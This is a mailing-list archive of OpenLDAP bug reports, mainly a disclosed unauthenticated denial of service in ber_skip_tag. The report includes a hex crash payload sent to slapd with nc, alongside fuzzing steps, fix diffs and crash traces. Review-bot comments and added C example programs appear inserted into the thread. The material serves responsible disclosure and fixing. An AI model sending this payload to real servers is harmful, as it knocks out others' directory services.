Re: (ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by stephan@srlabs.de
3 years, 6 months
Re: (ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by stephan@srlabs.de
Hi Ondřej —
The commit 1dbf0e9441def3d6dbc0fa8fba3c2e86fa50fa19 seems to fix the null
pointer dereference issue.
Using honggfuzz netdriver module, fuzzing of slapd can be accomplished
relatively easily. You can follow the below instructions to fuzz the server:
1. Install honggfuzz (stable)
$ export CC=hfuzz-clang
$ export CXX=hfuzz-clang++
2. Apply attached patch (fuzz.patch)
3. Compile openldap
$ ./configure
$ make depend
$ make
$ make install
4. Create testcase directory including seeds (probably you have way better
seeds than I have :), I just used ldap payloads extracted from some pcap's)
$ mkdir testcases
5. Start fuzzing
$ HFND_TCP_PORT=9090 honggfuzz -w ldap.wordlist -f testcases/ -- ./libexec/slapd -d 1 -h ldap://127.0.0.1:9090
As you see, the fuzzing setup is relatively simple thanks to honggfuzz.
Hope this helps!
Note: After Cyrus SASL fixes the other issue #9123, I will request CVE id's
for the two bugs and share them as a reference in the relevant issues
(#9123, #9124)
Cheers
    -Stephan
On 11/29/19 1:06 PM, Ondřej Kuzník wrote:
> On Fri, Nov 29, 2019 at 09:08:15AM +0000, stephan(a)srlabs.de wrote:
>> Unauthenticated remote denial-of-service through malformed ldap packet
>> caused by a null pointer dereference in ber_skip_tag function
>> (libraries/liblber/decode.c).
>>
>> ==4066091== by 0x4FD051: cancel_extop (cancel.c:52)
> Hi Stephan,
> thanks for the report, this should be fixed by commit
> 1dbf0e9441def3d6dbc0fa8fba3c2e86fa50fa19 in master.
>
> Looks like you are fuzzing the server which has been on my to do list
> for a while, many thanks for that and I'm looking forward to reading
> how you did it. Would you be willing to help the project integrate your
> work in its testing process after you've finished?
>
> Thanks,
>
diff --git a/servers/slapd/main.c b/servers/slapd/main.c
index f528aa951..1941ae3de 100644
--- a/servers/slapd/main.c
+++ b/servers/slapd/main.c
@@ -349,12 +349,14 @@ usage( char *name )
);
}
=20
-#ifdef HAVE_NT_SERVICE_MANAGER
-void WINAPI ServiceMain( DWORD argc, LPTSTR *argv )
+//#ifdef HAVE_NT_SERVICE_MANAGER
+//void WINAPI ServiceMain( DWORD argc, LPTSTR *argv )
+//#else
+#ifdef HFND_FUZZING_ENTRY_FUNCTION
+HFND_FUZZING_ENTRY_FUNCTION(int argc, char **argv) {
#else
-int main( int argc, char **argv )
+int main( int argc, char **argv ) {
#endif
-{
int i, no_detach =3D 0;
int rc =3D 1;
char *urls =3D NULL;
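Review bot: The `//`-commented `#ifdef HAVE_NT_SERVICE_MANAGER` and `ServiceMain` lines at the top of the hunk remove the Windows service entry point for every build, not only for fuzzing builds, so as written this is a local fuzzing patch rather than something that can be merged. Keep the original `#ifdef HAVE_NT_SERVICE_MANAGER` branch, add the fuzzing entry as `#elif defined(HFND_FUZZING_ENTRY_FUNCTION)` ahead of the `#else`, and leave the single opening brace after `#endif` instead of repeating it in each branch.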
3 years, 6 months
Re: (ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by ondra@mistotebe.net
On Fri, Nov 29, 2019 at 09:08:15AM +0000, stephan(a)srlabs.de wrote:
> Unauthenticated remote denial-of-service through malformed ldap packet
> caused by a null pointer dereference in ber_skip_tag function
> (libraries/liblber/decode.c).
>
> ==4066091== by 0x4FD051: cancel_extop (cancel.c:52)
Hi Stephan,
thanks for the report, this should be fixed by commit
1dbf0e9441def3d6dbc0fa8fba3c2e86fa50fa19 in master.
Looks like you are fuzzing the server which has been on my to do list
for a while, many thanks for that and I'm looking forward to reading
how you did it. Would you be willing to help the project integrate your
work in its testing process after you've finished?
Thanks,
--
Ondřej Kuzník
Senior Software Engineer
Symas Corporation http://www.symas.com
Packaged, certified, and supported LDAP solutions powered by OpenLDAP
3 years, 6 months
(ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by stephan@srlabs.de
Full_Name: Stephan Zeisberg
Version: 2.4.48
OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64)
URL:
Submission from: (NULL) (217.228.59.1)
# Issue description
Unauthenticated remote denial-of-service through malformed ldap packet caused by
a null pointer dereference in ber_skip_tag function
(libraries/liblber/decode.c).
# Version
openldap-2.4.48.tgz
# How to reproduce
## Compile
$ tar xzvf openldap-2.4.48.tgz
$ cd openldap-2.4.48
$ ./configure --prefix=/tmp/openldap
$ make depend
$ make
$ make install
$ cd /tmp/openldap
## Start server
$ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091
## Create PoC crash file
$ echo -n "3084000000b902022da277072d0b312e332e362e312e312e38810038303132353339313934303339cb36352e2e2e2e2e2e2e2ec8a6134cba3e07b6bc691e2e79a9a3f6d0bb7b5d789a8be1058da4a448206401aadcc21bc939ba86a2f30c64f585b9e65fafb0a10d8427736b1bc0422868aa1fda601953d87aa638228bc4ae2dc2f85be810f282847bcab689fb75755eed809d8e284b647ee3c76b52bd6e309d4fa7a2437cf195f6682b4bd303d2de1654160613adb2744b9632515871278b01671ca5a8faf18f736964d34f8da5d40370ec68f2b68b47fe1f2b6d1a04359f54ad827ae21963768ef1f854e03f173e1f57c1b04c5b3dd2a736bb6ea159e5000000000000000272af3a4164acbf51b0b27c7d1ed9ce4b52b0a6b0a4d678fecd8112dd6c4d00"
| xxd -r -p > ldap.crash
## Execute PoC (may need to be executed multiple times)
$ nc 127.0.0.1 9091 < ldap.crash
# Valgrind + UBSAN
5de0ddc3 connection_read(12): checking for input on id=1000
ber_get_next
ber_scanf fmt ({i}) ber:
==4066091== Thread 3:
==4066091== Invalid read of size 1
==4066091== at 0x63E1DF: ber_skip_tag (decode.c:256)
==4066091== by 0x63F7A8: ber_scanf (decode.c:865)
==4066091== by 0x4FD051: cancel_extop (cancel.c:52)
==4066091== by 0x4BE530: fe_extended (extended.c:222)
==4066091== by 0x4BE36B: do_extended (extended.c:177)
==4066091== by 0x472CA7: connection_operation (connection.c:1158)
==4066091== by 0x471331: connection_read_thread (connection.c:1294)
==4066091== by 0x5FEE79: ldap_int_thread_pool_wrapper (tpool.c:696)
==4066091== by 0xCA384E1: start_thread (in /usr/lib64/libpthread-2.30.so)
==4066091== by 0xCCC6692: clone (in /usr/lib64/libc-2.30.so)
==4066091== Address 0x0 is not stack'd, malloc'd or (recently) free'd
==4066091==
UndefinedBehaviorSanitizer5de0ddc3 ber_get_next on fd 12 failed errno=0
(Success)
:DEADLYSIGNAL
==4066091==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address
0x000000000000 (pc 0x00000063e1df bp 0x00004ee77660 sp 0x00004ee77640 T4066125)
==4066091==The signal is caused by a READ memory access.
==4066091==Hint: address points to the zero page.
==4066129== Warning: invalid file descriptor 1024 in syscall close()
#0 0x63e1de in ber_skip_tag
/tmp/openldap-2.4.48/libraries/liblber/decode.c:255:15
#1 0x63f7a8 in ber_scanf
/tmp/openldap-2.4.48/libraries/liblber/decode.c:865:10
#2 0x4fd051 in cancel_extop
/tmp/openldap-2.4.48/servers/slapd/cancel.c:52:7
#3 0x4be530 in fe_extended
/tmp/openldap-2.4.48/servers/slapd/extended.c:222:16
#4 0x4be36b in do_extended
/tmp/openldap-2.4.48/servers/slapd/extended.c:177:15
#5 0x472ca7 in connection_operation
/tmp/openldap-2.4.48/servers/slapd/connection.c:1158:7
#6 0x471331 in connection_read_thread
/tmp/openldap-2.4.48/servers/slapd/connection.c:1294:14
#7 0x5fee79 in ldap_int_thread_pool_wrapper
/tmp/openldap-2.4.48/libraries/libldap_r/tpool.c:696:3
#8 0xca384e1 in start_thread (/lib64/libpthread.so.0+0x94e1)
#9 0xccc6692 in clone (/lib64/libc.so.6+0x101692)
UndefinedBehaviorSanitizer can not provide additional info.
Please let me know what additional information I can provide to successfully
reproduce the issue.
Note: I have also tested and reproduced the issue using the precompiled package
from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP:
slapd 2.4.47 (Jul 25 2019 00:00:00))
-Stephan Zeisberg
3 years, 6 months
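The trace in the report above shows a one-byte read at address 0x0 in the tag decoder, reached from an extended-operation handler through `ber_scanf` with format `{i}`. As an added example (not OpenLDAP or liblber code; `struct berbuf`, `skip_tag` and `handle_exop` are hypothetical names), this is a tag/length reader and `SEQUENCE { INTEGER }` handler that returns a protocol error for an absent, empty or truncated request value instead of dereferencing it. It assumes the NULL came from a request value the client did not send, which the report does not state.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define TAG_ERROR ((uint32_t)-1)
enum { EXOP_OK = 0, EXOP_PROTOCOL_ERROR = 2 };   /* 2 = LDAP protocolError */

/* Hypothetical read cursor over received bytes (not liblber's BerElement). */
struct berbuf { const uint8_t *ptr, *end; };

/* Read one identifier octet and a definite length, advance past both and
 * return the tag. TAG_ERROR for absent, empty, truncated or oversized input. */
uint32_t skip_tag(struct berbuf *b, size_t *len)
{
    if (b == NULL || b->ptr == NULL || b->ptr >= b->end)
        return TAG_ERROR;                /* nothing to decode: never read *ptr */
    const uint8_t *p = b->ptr;
    uint8_t tag = *p++;
    if ((tag & 0x1f) == 0x1f || p >= b->end)
        return TAG_ERROR;                /* multi-octet tags are not handled here */
    size_t n = *p++;
    if (n & 0x80) {                      /* long form: low 7 bits = octet count */
        size_t cnt = n & 0x7f;
        if (cnt == 0 || cnt > sizeof(size_t) || cnt > (size_t)(b->end - p))
            return TAG_ERROR;
        for (n = 0; cnt > 0; cnt--)
            n = (n << 8) | *p++;
    }
    if (n > (size_t)(b->end - p))
        return TAG_ERROR;                /* claimed length exceeds received data */
    b->ptr = p;
    *len = n;
    return tag;
}

/* Decode a request value of the form SEQUENCE { INTEGER }, the "{i}" format
 * in the logged ber_scanf call. reqdata is NULL when no value was sent. */
int handle_exop(const uint8_t *reqdata, size_t reqlen, long *id_out)
{
    if (reqdata == NULL || reqlen == 0)
        return EXOP_PROTOCOL_ERROR;      /* reject before any decoding starts */
    struct berbuf b = { reqdata, reqdata + reqlen };
    size_t len = 0;
    if (skip_tag(&b, &len) != 0x30)      /* SEQUENCE */
        return EXOP_PROTOCOL_ERROR;
    b.end = b.ptr + len;                 /* confine parsing to the sequence body */
    if (skip_tag(&b, &len) != 0x02 || len == 0 || len > sizeof(long))
        return EXOP_PROTOCOL_ERROR;      /* INTEGER must fit in a long */
    unsigned long v = (b.ptr[0] & 0x80) ? ~0UL : 0UL;   /* sign-extend */
    for (size_t i = 0; i < len; i++)
        v = (v << 8) | b.ptr[i];
    *id_out = (long)v;
    return EXOP_OK;
}

int main(void)
{
    /* Constructed inputs: a valid value and one whose length field lies. */
    const uint8_t ok[]    = { 0x30, 0x03, 0x02, 0x01, 0x05 };
    const uint8_t trunc[] = { 0x30, 0x84, 0x00, 0x00, 0x00, 0x10, 0x02 };
    long id = 0;
    int rc = handle_exop(NULL, 0, &id);
    printf("absent:    rc=%d\n", rc);
    rc = handle_exop(trunc, sizeof trunc, &id);
    printf("truncated: rc=%d\n", rc);
    rc = handle_exop(ok, sizeof ok, &id);
    printf("valid:     rc=%d id=%ld\n", rc, id);
    return 0;
}
```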
Re: (ITS#9120) Searches including generalizedTime attributes with index
by hyc@symas.com
Howard Chu wrote:
> Howard Chu wrote:
>> markus.widmer(a)daasi.de wrote:
>
>>> We could reproduce this with 2.4.42, 2.4.44 and 2.4.48. We hope you can
>>> reproduce this as well to see what is happening here.
>>
>> Yes, can reproduce this. The function that converts a component-wise time
>> into a time_t is referencing time since 1970. The date in 1956 would yield a
>> negative time_t value but the fields are unsigned ints, so instead it's treated
>> as 17,000 years in the future. We can probably change this to handle signed
>> timestamps but need to consider this further.
>>
> I believe the best way forward would be to allow signed values, and also to switch
> our epoch reference from 1970-01-01 to 0000-01-01 (i.e., use Gregorian Proleptic calendar).
> Year zero would be 1 BCE in this calendar, and anything earlier would be a negative year.
>
> Changing these functions will require regenerating any indices. Looks like something
> we'll rewrite for 2.5 but leave 2.4 alone.
Fixed in git master commit 97c145919d8c702003b9cd8bac0e01083d3ab9a1
The time is now calculated with signed years, but the result is still returned
as an unsigned value (with negative years properly sorting as less than positive
years).
Note that the slapd schema validator still rejects negative years at the moment.
Will need to look further at that later.
--
-- Howard Chu
CTO, Symas Corp. http://www.symas.com
Director, Highland Sun http://highlandsun.com/hyc/
Chief Architect, OpenLDAP http://www.openldap.org/project/
3 years, 6 months
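The ordering problem discussed in the message above, as an added example (not OpenLDAP code): a pre-1970 date gives a negative second count, which sorts after every modern date once it is reinterpreted as unsigned, while flipping the sign bit yields an unsigned key that keeps signed order. The sign-bit mapping and all function names are assumptions for illustration; the message does not say how the fix builds its unsigned value.

```c
#include <stdint.h>
#include <stdio.h>

/* Days from 1970-01-01 to y-m-d in the proleptic Gregorian calendar
 * (year 0 is 1 BCE, earlier years are negative). */
int64_t days_from_civil(int64_t y, unsigned m, unsigned d)
{
    y -= (m <= 2);                                /* years run March..February */
    int64_t era = (y >= 0 ? y : y - 399) / 400;   /* floor(y / 400) */
    unsigned yoe = (unsigned)(y - era * 400);     /* year of era, 0..399 */
    unsigned doy = (153 * (m > 2 ? m - 3 : m + 9) + 2) / 5 + d - 1;
    unsigned doe = yoe * 365 + yoe / 4 - yoe / 100 + doy;
    return era * 146097 + (int64_t)doe - 719468;
}

int64_t secs_since_1970(int64_t y, unsigned m, unsigned d)
{
    return days_from_civil(y, m, d) * 86400;
}

/* Signed value stored in an unsigned field: negatives become huge. */
uint64_t key_unsigned_cast(int64_t secs)
{
    return (uint64_t)secs;
}

/* Sign bit flipped: INT64_MIN maps to 0, so unsigned order == signed order. */
uint64_t key_order_preserving(int64_t secs)
{
    return (uint64_t)secs ^ (UINT64_C(1) << 63);
}

int main(void)
{
    /* Constructed dates: one before the 1970 epoch, one after it. */
    int64_t old = secs_since_1970(1956, 1, 1);
    int64_t now = secs_since_1970(2019, 11, 29);
    printf("1956-01-01 = %lld s, 2019-11-29 = %lld s\n",
           (long long)old, (long long)now);
    printf("plain cast:      1956 sorts %s 2019\n",
           key_unsigned_cast(old) < key_unsigned_cast(now) ? "before" : "after");
    printf("sign bit flipped: 1956 sorts %s 2019\n",
           key_order_preserving(old) < key_order_preserving(now) ? "before" : "after");
    return 0;
}
```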
Re: (ITS#9123) Unauthenticated remote denial-of-service
by stephan@srlabs.de
Created an issue upstream [1] and included the valgrind output and proposed patch.
[1] https://github.com/cyrusimap/cyrus-sasl/issues/587
    -Stephan
On 11/28/19 4:16 PM, Howard Chu wrote:
> 5ddfddde do_bind: dn () SASL mech <garbage>
> 5ddfddde ==> sasl_bind: dn="" mech=<garbage>
> datalen=0
> ==11019== Thread 3:
> ==11019== Invalid write of size 1
> ==11019== at 0x4B9B1DB: sasl_seterror (seterror.c:247)
> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019== by 0x21E130: fe_op_bind (bind.c:279)
> ==11019== by 0x21DCE1: do_bind (bind.c:205)
> ==11019== by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479)
> ==11019== by 0x4EFA322: clone (clone.S:95)
> ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
> ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019== by 0x4B930A4: _buf_alloc (common.c:2186)
> ==11019== by 0x4B93299: _sasl_add_string (common.c:196)
> ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187)
> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019== by 0x21E130: fe_op_bind (bind.c:279)
> ==11019== by 0x21DCE1: do_bind (bind.c:205)
> ==11019== by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479)
> ==11019==
> ==11019== Invalid read of size 1
> ==11019== at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019== by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688)
> ==11019== by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114)
> ==11019== by 0x3A1FFA: lutil_debug (debug.c:74)
> ==11019== by 0x266FF3: slap_sasl_log (sasl.c:146)
> ==11019== by 0x4B9B4CF: sasl_seterror (seterror.c:260)
> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019== by 0x21E130: fe_op_bind (bind.c:279)
> ==11019== by 0x21DCE1: do_bind (bind.c:205)
> ==11019== by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
> ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019== by 0x4B930A4: _buf_alloc (common.c:2186)
> ==11019== by 0x4B93299: _sasl_add_string (common.c:196)
> ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187)
> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019== by 0x21E130: fe_op_bind (bind.c:279)
> ==11019== by 0x21DCE1: do_bind (bind.c:205)
> ==11019== by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479)
3 years, 6 months
Re: (ITS#9123) Unauthenticated remote denial-of-service
by hyc@symas.com
Stephan Zeisberg wrote:
> Hi Howard —
>
> Thanks for the quick reply. Will forward the report upstream to Cyrus SASL.
For reference, this fixes the bug:
vielle:/home/software/cyrus-sasl> git diff
diff --git a/lib/common.c b/lib/common.c
index bc3bf1df..9969d6aa 100644
--- a/lib/common.c
+++ b/lib/common.c
@@ -190,7 +190,7 @@ int _sasl_add_string(char **out, size_t *alloclen,
if (add=3D=3DNULL) add =3D "(null)";
- addlen=3Dstrlen(add); /* only compute once */
+ addlen=3Dstrlen(add)+1; /* only compute once */
if (_buf_alloc(out, alloclen, (*outlen)+addlen)!=3DSASL_OK)
return SASL_NOMEM;
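Review bot: After the changed line, `addlen` is no longer the length of `add` but the length plus the terminator, while the comment still reads "only compute once" and does not mention the extra byte. Any line below the hunk that copies `addlen` bytes or advances `*outlen` by it is not visible here and would now count the NUL as text; it is clearer to leave `addlen=strlen(add)` and reserve the terminator in the size passed to `_buf_alloc`, i.e. `(*outlen)+addlen+1`.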
Git history shows this bug has existed since the code was originally written in
commit 061698456069833e244d66ce33c8f82c2cd63ce3
Author: Rob Siemborski <rjs3(a)andrew.cmu.edu>
Date: Tue Dec 4 01:59:43 2001 +0000
>
> Best
>
>     -Stephan
>
> On 11/28/19 3:54 PM, Howard Chu wrote:
>> Resending with the non-printable chars omitted:
>>
>> Howard Chu wrote:
>>> Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting
>>> this issue to them.
>>>
>>> valgrind confirms it as well:
--
-- Howard Chu
CTO, Symas Corp. http://www.symas.com
Director, Highland Sun http://highlandsun.com/hyc/
Chief Architect, OpenLDAP http://www.openldap.org/project/
3 years, 6 months
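The off-by-one behind the "0 bytes after a block of size 600" write in the trace, as an added example (not Cyrus SASL code): the buffer is sized for the text only, so the terminator lands one byte past the block whenever the text fills it exactly. `struct strbuf` and all function names are hypothetical, the 594-byte fill level is constructed, and `strbuf_add` reserves the terminator in the allocation request while keeping `addlen` as the plain string length.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical growable string, modelled on the (out, alloclen, outlen)
 * arguments visible in the hunk; this is not Cyrus SASL code. */
struct strbuf {
    char  *data;
    size_t alloclen;   /* bytes allocated */
    size_t outlen;     /* text bytes stored, terminator not counted */
};

/* Size requested before the fix: room for the text only. */
size_t need_unfixed(size_t outlen, const char *add) { return outlen + strlen(add); }

/* Size that is really touched once the string is NUL-terminated. */
size_t need_fixed(size_t outlen, const char *add) { return outlen + strlen(add) + 1; }

/* 1 if the terminator written after appending `add` falls outside a buffer
 * of `alloclen` bytes that is grown to `requested` bytes only when needed. */
int terminator_out_of_bounds(size_t alloclen, size_t requested,
                             size_t outlen, const char *add)
{
    size_t cap = requested > alloclen ? requested : alloclen;
    return outlen + strlen(add) >= cap;
}

/* Append with the terminator reserved in the allocation request while
 * addlen stays the plain string length. Returns 0, or -1 on failure. */
int strbuf_add(struct strbuf *b, const char *add)
{
    if (add == NULL) add = "(null)";
    size_t addlen = strlen(add);
    if (addlen >= SIZE_MAX - b->outlen)
        return -1;                          /* outlen + addlen + 1 would wrap */
    size_t need = b->outlen + addlen + 1;
    if (need > b->alloclen) {
        char *p = realloc(b->data, need);
        if (p == NULL) return -1;
        b->data = p;
        b->alloclen = need;
    }
    memcpy(b->data + b->outlen, add, addlen + 1);   /* copies the NUL too */
    b->outlen += addlen;                            /* NUL is not counted */
    return 0;
}

int main(void)
{
    /* Constructed case: a 600-byte block (the size in the valgrind trace)
     * already holding 594 bytes of text, then "(null)" is appended. */
    const char *add = "(null)";
    size_t before = need_unfixed(594, add), after = need_fixed(594, add);
    printf("unfixed: request %zu, NUL out of bounds: %d\n",
           before, terminator_out_of_bounds(600, before, 594, add));
    printf("fixed:   request %zu, NUL out of bounds: %d\n",
           after, terminator_out_of_bounds(600, after, 594, add));

    struct strbuf b = { NULL, 0, 0 };
    if (strbuf_add(&b, "mech=") == 0 && strbuf_add(&b, NULL) == 0)
        printf("%s (outlen=%zu, alloclen=%zu)\n", b.data, b.outlen, b.alloclen);
    free(b.data);
    return 0;
}
```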
Re: (ITS#9123) Unauthenticated remote denial-of-service
by stephan@srlabs.de
Hi Howard —
Thanks for the quick reply. Will forward the report upstream to Cyrus SASL.
Best
    -Stephan
On 11/28/19 3:54 PM, Howard Chu wrote:
> Resending with the non-printable chars omitted:
>
> Howard Chu wrote:
>> Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting
>> this issue to them.
>>
>> valgrind confirms it as well:
3 years, 6 months